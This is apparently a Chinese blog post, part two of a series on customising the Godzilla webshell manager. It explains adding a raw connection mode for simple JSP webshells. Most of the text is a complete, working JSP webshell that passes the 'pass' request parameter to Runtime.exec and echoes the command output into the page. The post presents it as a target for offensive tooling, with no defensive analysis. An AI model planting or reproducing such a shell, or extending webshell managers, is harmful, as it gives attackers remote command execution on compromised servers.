哥斯拉二开记录2

上一部分主要针对php相关部分进行修改,这里主要针对Java,会稍微复杂一点。

增加Raw连接能力

哥斯拉的JSP都是基于AES加密的,当我们需要连接一个简单的JSP Webshell,比如下面这个的时候,就只能选择蚁剑或者冰蝎,不太方便,故增加此能力:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<%@ page language="java" pageEncoding="UTF-8" %>
<%
Runtime rt = Runtime.getRuntime();
String cmd = request.getParameter("pass");
Process process = rt.exec(cmd);
java.io.InputStream in = process.getInputStream();
System.out.println("---------- JSP EXECUTED ----------");
out.print("<pre>");
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
out.print("</pre>");
%>